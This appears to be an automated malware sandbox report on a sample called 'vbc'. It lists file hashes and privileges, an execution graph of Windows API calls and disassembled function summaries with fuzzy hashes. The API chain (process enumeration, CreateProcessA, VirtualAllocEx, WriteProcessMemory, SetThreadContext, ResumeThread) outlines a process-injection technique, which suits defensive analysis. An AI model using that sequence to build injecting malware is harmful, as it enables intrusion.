                                                                                                  File size:27136 bytes
                                                                                                  MD5 hash:419A5EF8D76693048E4D6F79A5C875AE
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate

                                                                                                  Disassembly

                                                                                                  Reset < >

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:11.5%
                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                    Signature Coverage:0%
                                                                                                    Total number of Nodes:330
                                                                                                    Total number of Limit Nodes:14
                                                                                                    execution_graph 51925 e11910 51926 e11954 EnumChildWindows 51925->51926 51928 e11997 51926->51928 51516 eba6e8 51517 eba733 CopyFileW 51516->51517 51519 eba790 51517->51519 51524 ebda58 51525 ebda9d Wow64SetThreadContext 51524->51525 51527 ebdae5 51525->51527 51874 ebd908 51875 ebd948 ResumeThread 51874->51875 51877 ebd979 51875->51877 51878 2622c0 51879 2622ce 51878->51879 51880 2622eb 51879->51880 51884 262320 51879->51884 51887 265090 51880->51887 51893 261a80 51884->51893 51886 262349 51886->51880 51888 261a80 14 API calls 51887->51888 51889 2650d5 51888->51889 51891 265740 14 API calls 51889->51891 51892 265750 14 API calls 51889->51892 51890 262310 51891->51890 51892->51890 51896 4f19d8 51893->51896 51899 4f1a8a 51896->51899 51897 261a88 51897->51886 51900 4f1a97 51899->51900 51901 4f1ae5 51899->51901 51904 4f1a8a 14 API calls 51900->51904 51906 4f1b48 51901->51906 51902 4f1ab2 51902->51897 51903 4f1b02 51903->51897 51904->51902 51907 4f1b4b 51906->51907 51910 4f1b98 51906->51910 51908 4f1b57 51907->51908 51907->51910 51916 4f1b48 14 API calls 51908->51916 51918 4f1b90 51908->51918 51909 4f1b7b 51909->51903 51912 4fa599 14 API calls 51910->51912 51913 4fa2c8 14 API calls 51910->51913 51914 4fa2d8 14 API calls 51910->51914 51915 4fa358 14 API calls 51910->51915 51911 4f1bc6 51911->51903 51912->51911 51913->51911 51914->51911 51915->51911 51916->51909 51919 4f1b9d 51918->51919 51921 4fa599 14 API calls 51919->51921 51922 4fa2c8 14 API calls 51919->51922 51923 4fa2d8 14 API calls 51919->51923 51924 4fa358 14 API calls 51919->51924 51920 4f1bc6 51920->51909 51921->51920 51922->51920 51923->51920 51924->51920 51528 4f1c78 51529 4f1c97 51528->51529 51532 4f1ce8 51529->51532 51530 4f1ca7 51533 4f1ceb 51532->51533 51534 4f1d15 51532->51534 51533->51534 51537 265750 51533->51537 51546 265740 51533->51546 51534->51530 51543 26575a 51537->51543 51555 265b60 51537->51555 51559 4f9c90 51537->51559 51563 4fd7f0 51537->51563 51574 4fd7e2 51537->51574 51585 4f9bb8 51537->51585 51590 4f9bc8 51537->51590 51595 265b70 51537->51595 51543->51534 51547 26575a 51546->51547 51548 265b60 14 API calls 51546->51548 51549 265b70 14 API calls 51546->51549 51550 4f9bc8 14 API calls 51546->51550 51551 4f9bb8 14 API calls 51546->51551 51552 4fd7e2 14 API calls 51546->51552 51553 4fd7f0 14 API calls 51546->51553 51554 4f9c90 14 API calls 51546->51554 51547->51534 51548->51547 51549->51547 51550->51547 51551->51547 51552->51547 51553->51547 51554->51547 51556 265ba0 51555->51556 51557 265750 14 API calls 51556->51557 51558 265c18 51556->51558 51557->51558 51558->51543 51561 4f9cb0 51559->51561 51560 4f9d04 51560->51543 51599 4fa1a0 51561->51599 51564 4fd807 51563->51564 51566 4fd868 51564->51566 51571 484aad1 14 API calls 51564->51571 51637 4fdfc1 51564->51637 51644 522850 51564->51644 51647 52c3f0 51564->51647 51652 4fdfd0 51564->51652 51659 ebcb11 51564->51659 51664 52c3e1 51564->51664 51669 522840 51564->51669 51566->51543 51571->51566 51575 4fd807 51574->51575 51576 4fd868 51575->51576 51577 52c3f0 14 API calls 51575->51577 51578 522850 14 API calls 51575->51578 51579 4fdfc1 14 API calls 51575->51579 51580 522840 14 API calls 51575->51580 51581 52c3e1 14 API calls 51575->51581 51582 484aad1 14 API calls 51575->51582 51583 ebcb11 14 API calls 51575->51583 51584 4fdfd0 14 API calls 51575->51584 51576->51543 51577->51576 51578->51576 51579->51576 51580->51576 51581->51576 51582->51576 51583->51576 51584->51576 51586 4f9bd9 51585->51586 51587 4f9bf1 51586->51587 51589 4fa1a0 14 API calls 51586->51589 51587->51543 51588 4f9d04 51588->51543 51589->51588 51593 4f9bd9 51590->51593 51591 4f9bf1 51591->51543 51592 4f9d04 51592->51543 51593->51591 51594 4fa1a0 14 API calls 51593->51594 51594->51592 51596 265ba0 51595->51596 51597 265750 14 API calls 51596->51597 51598 265c18 51596->51598 51597->51598 51598->51543 51601 4fa1ae 51599->51601 51600 4fa292 51600->51560 51601->51600 51605 4fa2c8 51601->51605 51616 4fa2d8 51601->51616 51602 4fa288 51602->51560 51606 4fa2ef 51605->51606 51608 4fa321 51605->51608 51613 4fa2c8 14 API calls 51606->51613 51614 4fa2d8 14 API calls 51606->51614 51627 4fa358 51606->51627 51607 4fa31a 51607->51602 51609 4fa3b0 51608->51609 51611 265740 14 API calls 51608->51611 51612 265750 14 API calls 51608->51612 51633 484aad1 51608->51633 51609->51602 51611->51609 51612->51609 51613->51607 51614->51607 51617 4fa2ef 51616->51617 51619 4fa321 51616->51619 51624 4fa2c8 14 API calls 51617->51624 51625 4fa2d8 14 API calls 51617->51625 51626 4fa358 14 API calls 51617->51626 51618 4fa31a 51618->51602 51620 4fa3b0 51619->51620 51621 484aad1 14 API calls 51619->51621 51622 265740 14 API calls 51619->51622 51623 265750 14 API calls 51619->51623 51620->51602 51621->51620 51622->51620 51623->51620 51624->51618 51625->51618 51626->51618 51628 4fa37e 51627->51628 51629 4fa3b0 51628->51629 51630 484aad1 14 API calls 51628->51630 51631 265740 14 API calls 51628->51631 51632 265750 14 API calls 51628->51632 51629->51607 51630->51629 51631->51629 51632->51629 51634 484aaf7 51633->51634 51635 265740 14 API calls 51633->51635 51636 265750 14 API calls 51633->51636 51634->51609 51635->51634 51636->51634 51638 4fdfe1 51637->51638 51639 522850 14 API calls 51637->51639 51640 522840 14 API calls 51637->51640 51642 4fdfc1 14 API calls 51637->51642 51643 4fdfd0 14 API calls 51637->51643 51672 4ff7b8 51637->51672 51638->51566 51639->51638 51640->51638 51642->51638 51643->51638 51645 522868 51644->51645 51646 4ff7b8 14 API calls 51644->51646 51645->51566 51646->51645 51648 52c3fc 51647->51648 51650 52c486 51648->51650 51824 52c532 51648->51824 51650->51566 51653 522850 14 API calls 51652->51653 51654 522840 14 API calls 51652->51654 51655 4ff7b8 14 API calls 51652->51655 51656 4fdfe1 51652->51656 51657 4fdfc1 14 API calls 51652->51657 51658 4fdfd0 14 API calls 51652->51658 51653->51656 51654->51656 51655->51656 51656->51566 51657->51656 51658->51656 51660 ebcb22 51659->51660 51661 ebcb31 51660->51661 51862 ebcb48 51660->51862 51866 ebcb46 51660->51866 51661->51566 51665 52c3f0 51664->51665 51667 52c486 51665->51667 51668 52c532 14 API calls 51665->51668 51666 52c481 51666->51566 51667->51566 51668->51666 51670 522868 51669->51670 51671 4ff7b8 14 API calls 51669->51671 51670->51566 51671->51670 51673 4ff7e4 51672->51673 51676 4ffa4f 51672->51676 51689 4ff7f8 51672->51689 51673->51638 51677 4ffa35 51676->51677 51686 4ffa46 51677->51686 51702 4362982 51677->51702 51712 4362e62 51677->51712 51717 4362652 51677->51717 51722 4362658 51677->51722 51727 4362058 51677->51727 51732 436203c 51677->51732 51737 4362e90 51677->51737 51742 4362cc0 51677->51742 51750 4362480 51677->51750 51759 4362460 51677->51759 51686->51673 51690 4ff825 51689->51690 51691 4362652 2 API calls 51690->51691 51692 4362e62 2 API calls 51690->51692 51693 4362982 4 API calls 51690->51693 51694 4362460 6 API calls 51690->51694 51695 4362480 6 API calls 51690->51695 51696 4362cc0 4 API calls 51690->51696 51697 4362e90 2 API calls 51690->51697 51698 436203c 2 API calls 51690->51698 51699 4ff830 51690->51699 51700 4362058 2 API calls 51690->51700 51701 4362658 2 API calls 51690->51701 51691->51699 51692->51699 51693->51699 51694->51699 51695->51699 51696->51699 51697->51699 51698->51699 51699->51673 51700->51699 51701->51699 51703 436298f 51702->51703 51706 43629b5 51702->51706 51703->51686 51704 4362a64 51704->51686 51705 4362fb3 51706->51704 51707 4362df1 51706->51707 51768 ebe1d8 51706->51768 51772 ebe1d1 51706->51772 51707->51705 51776 ebdbe8 51707->51776 51780 ebdbf0 51707->51780 51714 4362e63 51712->51714 51713 4362fb3 51714->51713 51715 ebdbe8 WriteProcessMemory 51714->51715 51716 ebdbf0 WriteProcessMemory 51714->51716 51715->51713 51716->51713 51718 4362732 51717->51718 51719 4362681 51717->51719 51719->51718 51784 e10730 51719->51784 51787 e10728 51719->51787 51723 4362681 51722->51723 51724 4362732 51722->51724 51723->51724 51725 e10730 K32EnumProcessModules 51723->51725 51726 e10728 K32EnumProcessModules 51723->51726 51725->51724 51726->51724 51728 4362086 51727->51728 51729 4362297 51727->51729 51728->51729 51790 ebdd98 51728->51790 51794 ebdd8d 51728->51794 51733 4362297 51732->51733 51734 4362086 51732->51734 51734->51733 51735 ebdd98 CreateProcessA 51734->51735 51736 ebdd8d CreateProcessA 51734->51736 51735->51733 51736->51733 51738 4362fb3 51737->51738 51739 4362ebd 51737->51739 51739->51738 51740 ebdbe8 WriteProcessMemory 51739->51740 51741 ebdbf0 WriteProcessMemory 51739->51741 51740->51738 51741->51738 51743 4362ced 51742->51743 51744 4362df1 51742->51744 51743->51744 51748 ebe1d8 ReadProcessMemory 51743->51748 51749 ebe1d1 ReadProcessMemory 51743->51749 51745 4362fb3 51744->51745 51746 ebdbe8 WriteProcessMemory 51744->51746 51747 ebdbf0 WriteProcessMemory 51744->51747 51746->51745 51747->51745 51748->51744 51749->51744 51751 43624a9 51750->51751 51752 4362522 51750->51752 51751->51752 51798 ebeea8 51751->51798 51803 ebd525 51751->51803 51807 ebd4f5 51751->51807 51811 ebd521 51751->51811 51815 ebd51d 51751->51815 51819 ebeeb8 51751->51819 51760 43624a9 51759->51760 51761 4362522 51759->51761 51760->51761 51762 ebeea8 K32EnumProcesses 51760->51762 51763 ebeeb8 K32EnumProcesses 51760->51763 51764 ebd51d K32EnumProcesses 51760->51764 51765 ebd521 K32EnumProcesses 51760->51765 51766 ebd4f5 K32EnumProcesses 51760->51766 51767 ebd525 K32EnumProcesses 51760->51767 51762->51761 51763->51761 51764->51761 51765->51761 51766->51761 51767->51761 51769 ebe223 ReadProcessMemory 51768->51769 51771 ebe267 51769->51771 51771->51707 51773 ebe223 ReadProcessMemory 51772->51773 51775 ebe267 51773->51775 51775->51707 51777 ebdc38 WriteProcessMemory 51776->51777 51779 ebdc8f 51777->51779 51779->51705 51781 ebdc38 WriteProcessMemory 51780->51781 51783 ebdc8f 51781->51783 51783->51705 51785 e10778 K32EnumProcessModules 51784->51785 51786 e107b2 51785->51786 51786->51718 51788 e10778 K32EnumProcessModules 51787->51788 51789 e107b2 51788->51789 51789->51718 51791 ebde21 51790->51791 51791->51791 51792 ebdf86 CreateProcessA 51791->51792 51793 ebdfe3 51792->51793 51795 ebde21 CreateProcessA 51794->51795 51797 ebdfe3 51795->51797 51799 ebeee3 51798->51799 51800 ebf67b K32EnumProcesses 51799->51800 51802 ebef80 51799->51802 51801 ebf6b2 51800->51801 51801->51752 51802->51752 51804 ebd529 K32EnumProcesses 51803->51804 51806 ebf6b2 51804->51806 51806->51752 51808 ebd4fa K32EnumProcesses 51807->51808 51810 ebf6b2 51808->51810 51810->51752 51812 ebd529 K32EnumProcesses 51811->51812 51814 ebf6b2 51812->51814 51814->51752 51816 ebd529 K32EnumProcesses 51815->51816 51818 ebf6b2 51816->51818 51818->51752 51820 ebeee3 51819->51820 51821 ebf67b K32EnumProcesses 51820->51821 51823 ebef80 51820->51823 51822 ebf6b2 51821->51822 51822->51752 51823->51752 51827 52c568 51824->51827 51828 52c598 51827->51828 51829 52c738 51828->51829 51832 52c8f2 51828->51832 51833 52c751 51828->51833 51830 522850 14 API calls 51829->51830 51831 52c481 51830->51831 51831->51566 51833->51832 51835 52cb8a 51833->51835 51839 52cbd0 51835->51839 51848 52cbc0 51835->51848 51836 52cbbb 51836->51832 51840 52cbdb 51839->51840 51847 4f1ce8 14 API calls 51840->51847 51841 52cbe1 51844 4fa2c8 14 API calls 51841->51844 51845 4fa2d8 14 API calls 51841->51845 51846 4fa358 14 API calls 51841->51846 51857 4fa599 51841->51857 51842 52cbfa 51842->51836 51844->51842 51845->51842 51846->51842 51847->51841 51849 52cbdb 51848->51849 51852 4f1ce8 14 API calls 51849->51852 51850 52cbe1 51853 4fa599 14 API calls 51850->51853 51854 4fa2c8 14 API calls 51850->51854 51855 4fa2d8 14 API calls 51850->51855 51856 4fa358 14 API calls 51850->51856 51851 52cbfa 51851->51836 51852->51850 51853->51851 51854->51851 51855->51851 51856->51851 51858 484aad1 14 API calls 51857->51858 51859 265740 14 API calls 51857->51859 51860 265750 14 API calls 51857->51860 51861 4fa5b5 51857->51861 51858->51861 51859->51861 51860->51861 51861->51842 51863 ebcb73 51862->51863 51865 52c532 14 API calls 51863->51865 51864 ebcc88 51865->51864 51867 ebcb73 51866->51867 51869 52c532 14 API calls 51867->51869 51868 ebcc88 51869->51868 51520 e107f8 51522 e1084d K32GetModuleBaseNameA 51520->51522 51523 e1090b 51522->51523 51870 ebdb30 51871 ebdb70 VirtualAllocEx 51870->51871 51873 ebdbad 51871->51873

                                                                                                    Executed Functions

                                                                                                    Function 00EB0048 Relevance: 10.7, Strings: 8, Instructions: 713COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 194 eb0048-eb0096 196 eb0098-eb00a1 194->196 197 eb00a7-eb00c2 194->197 196->197 198 eb0608-eb0615 197->198 199 eb00c8-eb00ea 197->199 200 eb0620-eb067e call 54bb12 198->200 201 eb0617-eb061d 198->201 207 eb00f0-eb010a 199->207 208 eb04d4-eb0530 199->208 205 eb0578-eb05cd 200->205 206 eb0684-eb0696 200->206 201->200 246 eb05d8 205->246 212 eb089c-eb08e0 206->212 213 eb069c-eb06ae 206->213 216 eb012e-eb0161 207->216 217 eb010c-eb011d 207->217 221 eb053b-eb056d 208->221 237 eb08e7-eb08ed 212->237 213->212 218 eb06b4-eb06bc 213->218 231 eb0163-eb0176 216->231 232 eb0182-eb0231 216->232 217->216 228 eb011f-eb0128 217->228 218->221 222 eb06c2-eb074c 218->222 221->205 264 eb0a93-eb0a9d 222->264 265 eb0752-eb0762 222->265 228->216 231->232 273 eb0497-eb04c9 232->273 274 eb0237-eb023e 232->274 244 eb08f5-eb0967 237->244 250 eb0969-eb09d2 244->250 251 eb09d4-eb0a2a 244->251 252 eb05dd-eb05f9 246->252 253 eb0a30-eb0a8e 250->253 251->253 252->198 260 eb0851-eb087d 253->260 281 eb03bf-eb03ce 260->281 282 eb0883-eb0897 260->282 264->260 267 eb0aa3-eb0ab3 264->267 265->237 268 eb0768-eb077b 265->268 267->260 269 eb0ab9-eb0acb 267->269 277 eb077d-eb0783 268->277 278 eb0786-eb079b 268->278 269->260 280 eb0ad1-eb0aec call eb0c18 269->280 273->208 274->246 279 eb0244-eb02e5 274->279 277->278 278->244 286 eb07a1-eb084f 278->286 279->252 321 eb02eb-eb03bd 279->321 296 eb0af2-eb0af4 280->296 291 eb0460-eb0476 281->291 292 eb03d4-eb03e9 281->292 282->281 286->260 297 eb0b3c-eb0b4f 291->297 303 eb0af9-eb0b0e 292->303 304 eb03ef-eb040d call eb0d50 292->304 296->260 308 eb047b-eb048f 303->308 309 eb0b14-eb0b35 303->309 310 eb0413-eb0427 304->310 308->273 309->297 318 eb0429-eb043b 310->318 319 eb043d-eb045e 310->319 318->291 318->319 319->291 321->281
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.605364405.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_eb0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: <,S$<,S$<,S$<,S$X-[l$jS$jS$jS
                                                                                                    • API String ID: 0-2299804134
                                                                                                    • Opcode ID: c8670c73e51ec30436fd07a2353c9b72f14e280885d2daa8a531db799fdd50c4
                                                                                                    • Instruction ID: 11d64b68bc355949666c9b90e86ae8785488552469e40de5b2392c666dba7940
                                                                                                    • Opcode Fuzzy Hash: c8670c73e51ec30436fd07a2353c9b72f14e280885d2daa8a531db799fdd50c4
                                                                                                    • Instruction Fuzzy Hash: 9C62FC75A012288FDB64DF69C990BEEBBF2AF88314F1540E9E549A7351DB309E81CF50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00EB8350 Relevance: 5.8, Strings: 4, Instructions: 763COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 709 eb8350-eb8366 710 eb8368-eb837f 709->710 711 eb8381-eb838d 709->711 713 eb83a7-eb83c6 710->713 712 eb838f-eb83a4 711->712 711->713 712->713 715 eb83c8-eb83d8 713->715 716 eb840f-eb8413 713->716 718 eb83da 715->718 719 eb83e0-eb83e6 715->719 720 eb8435-eb843b 716->720 721 eb8415-eb8419 716->721 718->716 722 eb83dc-eb83de 718->722 719->716 724 eb843d-eb8441 720->724 725 eb8443-eb8449 720->725 721->720 723 eb841b-eb8433 721->723 722->716 722->719 723->720 729 eb83e8-eb83f8 723->729 724->725 726 eb844c-eb84a4 724->726 734 eb84aa-eb84b7 726->734 735 eb852e-eb8587 726->735 729->716 730 eb83fa-eb840c 729->730 730->716 738 eb84b9-eb84c7 call eb7ef1 734->738 739 eb84ce-eb84da 734->739 751 eb858d-eb8593 735->751 752 eb8642-eb8666 735->752 741 eb84c9-eb84cc 738->741 745 eb84dc-eb8500 739->745 746 eb8502 739->746 743 eb850b-eb852b 741->743 745->743 745->746 746->743 753 eb85bd-eb85cb 751->753 754 eb8595-eb8598 751->754 763 eb866d-eb86c9 752->763 759 eb85db-eb860c 753->759 760 eb85cd 753->760 755 eb859a-eb85bc 754->755 756 eb860d-eb863b 754->756 756->752 760->763 764 eb85d3-eb85d5 760->764 774 eb86cb-eb86f2 763->774 775 eb86f3-eb8739 763->775 764->759 764->763 780 eb873b-eb8744 call eb8350 775->780 781 eb8749-eb874d 775->781 780->781 783 eb874f-eb875e 781->783 784 eb8763-eb8774 781->784 785 eb8af8-eb8aff 783->785 786 eb877a-eb878f 784->786 787 eb8c68-eb8ca1 784->787 788 eb879b-eb87ae 786->788 789 eb8791-eb8796 786->789 790 eb8b00-eb8b1d 788->790 791 eb87b4-eb87c0 788->791 789->785 799 eb8b24-eb8b41 790->799 791->787 793 eb87c6-eb87fd 791->793 794 eb8809-eb880d 793->794 795 eb87ff-eb8804 793->795 798 eb8813-eb881f 794->798 794->799 795->785 798->787 801 eb8825-eb885c 798->801 807 eb8b48-eb8b65 799->807 805 eb8868-eb886c 801->805 806 eb885e-eb8863 801->806 805->807 808 eb8872-eb887e 805->808 806->785 818 eb8b6c-eb8b89 807->818 808->787 812 eb8884-eb88bb 808->812 815 eb88bd-eb88c2 812->815 816 eb88c7-eb88cb 812->816 815->785 816->818 819 eb88d1-eb88dd 816->819 825 eb8b90-eb8bad 818->825 819->787 821 eb88e3-eb891a 819->821 823 eb891c-eb8921 821->823 824 eb8926-eb892a 821->824 823->785 824->825 826 eb8930-eb893c 824->826 835 eb8bb4-eb8bd1 825->835 826->787 829 eb8942-eb8979 826->829 830 eb897b-eb8980 829->830 831 eb8985-eb8989 829->831 830->785 834 eb898f-eb899b 831->834 831->835 834->787 836 eb89a1-eb89d8 834->836 841 eb8bd8-eb8bf5 835->841 839 eb89da-eb89df 836->839 840 eb89e4-eb89e8 836->840 839->785 840->841 842 eb89ee-eb89fa 840->842 851 eb8bfc-eb8c19 841->851 842->787 845 eb8a00-eb8a37 842->845 847 eb8a39-eb8a3e 845->847 848 eb8a43-eb8a47 845->848 847->785 850 eb8a4d-eb8a59 848->850 848->851 850->787 853 eb8a5f-eb8a96 850->853 858 eb8c20-eb8c3d 851->858 854 eb8a98-eb8a9d 853->854 855 eb8a9f-eb8aa3 853->855 854->785 857 eb8aa9-eb8ab2 855->857 855->858 857->787 861 eb8ab8-eb8aed 857->861 863 eb8c44-eb8c61 858->863 862 eb8af3 861->862 861->863 862->785 863->787
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.605364405.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_eb0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: <,S$<,S$<,S$l{S
                                                                                                    • API String ID: 0-1740597163
                                                                                                    • Opcode ID: ccbfd22a76caba441c99e7fb0a47fd8e86e75ad612f4047e185a54701ce36cfd
                                                                                                    • Instruction ID: 12069b9961c3b0fdd268cc189f4f89be838f0e3b20049c7a2decd68a6fc96989
                                                                                                    • Opcode Fuzzy Hash: ccbfd22a76caba441c99e7fb0a47fd8e86e75ad612f4047e185a54701ce36cfd
                                                                                                    • Instruction Fuzzy Hash: A6526970A006158FCB19DF68C994AAEFBF2BF88304F14852DD55AAB791DB30ED05CB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0054CAB8 Relevance: 4.2, Strings: 3, Instructions: 500COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1221 54cab8-54cae0 1223 54cae2-54cb29 1221->1223 1224 54cb2e-54cb3c 1221->1224 1255 54cfc8-54cfcf 1223->1255 1225 54cb3e-54cb49 call 549aa0 1224->1225 1226 54cb4b 1224->1226 1228 54cb4d-54cb5c 1225->1228 1226->1228 1233 54cb62-54cb6e 1228->1233 1234 54cc4b-54cc57 1228->1234 1240 54cb74-54cb78 1233->1240 1241 54cfd0-54cffa 1233->1241 1238 54cca5-54ccaf 1234->1238 1239 54cc59-54cc68 call 547ca0 1234->1239 1243 54ccf1-54cd17 1238->1243 1244 54ccb1-54ccc9 call 5474c0 1238->1244 1257 54cc6c-54cc71 1239->1257 1246 54cb8a-54cbe6 call 549778 call 54a288 1240->1246 1247 54cb7a-54cb84 1240->1247 1252 54d002-54d02c 1241->1252 1266 54cd24 1243->1266 1267 54cd19-54cd22 1243->1267 1270 54d034-54d047 1244->1270 1271 54cccf-54ccec 1244->1271 1285 54cbec-54cc46 1246->1285 1286 54d08d-54d0b5 1246->1286 1247->1246 1247->1252 1252->1270 1261 54cc73-54cca0 call 54c988 1257->1261 1262 54cc6a 1257->1262 1261->1255 1262->1257 1274 54cd26-54cd51 1266->1274 1267->1274 1289 54d04e-54d086 1270->1289 1271->1255 1290 54ce37-54ce3b 1274->1290 1291 54cd57-54cd84 1274->1291 1285->1255 1294 54d0b7-54d0bd 1286->1294 1295 54d0bf-54d0c5 1286->1295 1289->1286 1296 54cec0-54ceca 1290->1296 1297 54ce41-54ce5a 1290->1297 1291->1290 1305 54cd8a-54cd99 call 547458 1291->1305 1294->1295 1298 54d0c6-54d103 1294->1298 1300 54cf30-54cf39 1296->1300 1301 54cecc-54ced6 1296->1301 1297->1296 1323 54ce5c-54ce6b call 547458 1297->1323 1306 54cf71-54cfbe 1300->1306 1307 54cf3b-54cf69 call 548f60 call 548f80 1300->1307 1317 54cedc-54ceee 1301->1317 1318 54ced8-54ceda 1301->1318 1325 54cdb1-54cdc6 1305->1325 1326 54cd9b-54cda1 1305->1326 1333 54cfc6 1306->1333 1307->1306 1324 54cef0-54cefb 1317->1324 1318->1324 1348 54ce83-54ce91 1323->1348 1349 54ce6d-54ce73 1323->1349 1345 54cefd-54cf01 1324->1345 1346 54cf29-54cf2e 1324->1346 1330 54cdf8-54ce04 1325->1330 1331 54cdc8-54cdf2 call 548190 1325->1331 1327 54cda5-54cda7 1326->1327 1328 54cda3 1326->1328 1327->1325 1328->1325 1330->1286 1342 54ce0a-54ce31 1330->1342 1331->1289 1331->1330 1333->1255 1342->1290 1342->1305 1351 54cf03-54cf1c 1345->1351 1352 54cf1f-54cf24 call 545e00 1345->1352 1346->1300 1346->1301 1348->1286 1350 54ce97-54cebe 1348->1350 1354 54ce75 1349->1354 1355 54ce77-54ce79 1349->1355 1350->1296 1350->1323 1351->1352 1352->1346 1354->1348 1355->1348
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: <,S$<,S$<,S
                                                                                                    • API String ID: 0-2199480955
                                                                                                    • Opcode ID: 0241a0f62d0836986b6e883548ff6cd961827f65b329de3a751eb6895252f5aa
                                                                                                    • Instruction ID: 439f0b63800d9044db4605003b70f0b99ef477e34a8a2c9aaf71f59a846aea37
                                                                                                    • Opcode Fuzzy Hash: 0241a0f62d0836986b6e883548ff6cd961827f65b329de3a751eb6895252f5aa
                                                                                                    • Instruction Fuzzy Hash: DA125171B006049FCB58DFA4C894AAEBBB6FFC8304F158469E906AB355DB35DC46CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 005463B0 Relevance: 3.7, Strings: 2, Instructions: 1177COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4$<,S
                                                                                                    • API String ID: 0-1542563366
                                                                                                    • Opcode ID: 3989392e447ee92c5778b42300b63a9ee85b3117e96ea040f7d2899b552de0c8
                                                                                                    • Instruction ID: 49bf4cf7a49f14bfe93e2dfbcee211922fef295ef5457a0202880a594452f6ad
                                                                                                    • Opcode Fuzzy Hash: 3989392e447ee92c5778b42300b63a9ee85b3117e96ea040f7d2899b552de0c8
                                                                                                    • Instruction Fuzzy Hash: 19B20774A002188FDB14CFA4C994BADBBB6FF89304F2581A9E506AB365DB30DD85CF51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00549778 Relevance: 3.1, Strings: 2, Instructions: 600COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: <,S$X-[l
                                                                                                    • API String ID: 0-576807484
                                                                                                    • Opcode ID: 0d911e989643c91b6985154016074737758b7e4c1fb21a9e228325060665162e
                                                                                                    • Instruction ID: 01b09214ef175327dd88e794c7ff7bcbde749b9b44a86eed7297d7f79a54d908
                                                                                                    • Opcode Fuzzy Hash: 0d911e989643c91b6985154016074737758b7e4c1fb21a9e228325060665162e
                                                                                                    • Instruction Fuzzy Hash: 49322C34B002058FDB14DF69C995AAA7BF6FF89308B1584A9E906CB375DB31EC41CB51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00546708 Relevance: 3.0, Strings: 2, Instructions: 507COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4$<,S
                                                                                                    • API String ID: 0-1542563366
                                                                                                    • Opcode ID: c62b810e287d73cad83859a159e58ac8c454fadeba9a8f4c1f67b62ba22b9b50
                                                                                                    • Instruction ID: 2aa03f5a0d2f46bada0e5bd519a4a485d4b65dde1c03c89a00e0a74e4adb70a9
                                                                                                    • Opcode Fuzzy Hash: c62b810e287d73cad83859a159e58ac8c454fadeba9a8f4c1f67b62ba22b9b50
                                                                                                    • Instruction Fuzzy Hash: D5320974A00218CFDB24DFA4C984BADBBB6FF89304F1584A9D509AB365DB30AD85CF51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00260C90 Relevance: 2.0, Strings: 1, Instructions: 719COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.603959792.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_260000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: TVZl
                                                                                                    • API String ID: 0-155880774
